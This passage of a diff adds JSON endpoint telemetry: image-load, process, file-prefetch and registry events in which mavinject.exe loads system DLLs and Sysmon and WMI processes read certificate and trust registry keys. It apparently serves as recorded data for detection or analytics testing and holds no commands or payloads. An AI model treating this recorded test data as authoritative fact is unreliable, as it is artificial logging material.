"C:\\Windows\\System32\\user32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "process", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "subtype": "terminate", + "timestamp": 131883573571040000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "file", + "file_name": "MAVINJECT.EXE-B106A478.pf", + "file_path": "C:\\Windows\\Prefetch\\MAVINJECT.EXE-B106A478.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573571200016, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "WMIAPSRV.EXE-576286C3.pf", + "file_path": "C:\\Windows\\Prefetch\\WMIAPSRV.EXE-576286C3.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573582140000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "WMIPRVSE.EXE-43972D0F.pf", + "file_path": "C:\\Windows\\Prefetch\\WMIPRVSE.EXE-43972D0F.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573589960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883573600110000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883573600110000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "image_load", + "image_name": "Wldap32.dll", + "image_path": "C:\\Windows\\System32\\Wldap32.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "FirewallAPI.dll", + "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "ntdsapi.dll", + "image_path": "C:\\Windows\\System32\\ntdsapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "mi.dll", + "image_path": "C:\\Windows\\System32\\mi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "miutils.dll", + "image_path": "C:\\Windows\\System32\\miutils.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "fwbase.dll", + "image_path": "C:\\Windows\\System32\\fwbase.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wfascim.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wfascim.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wbemprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": 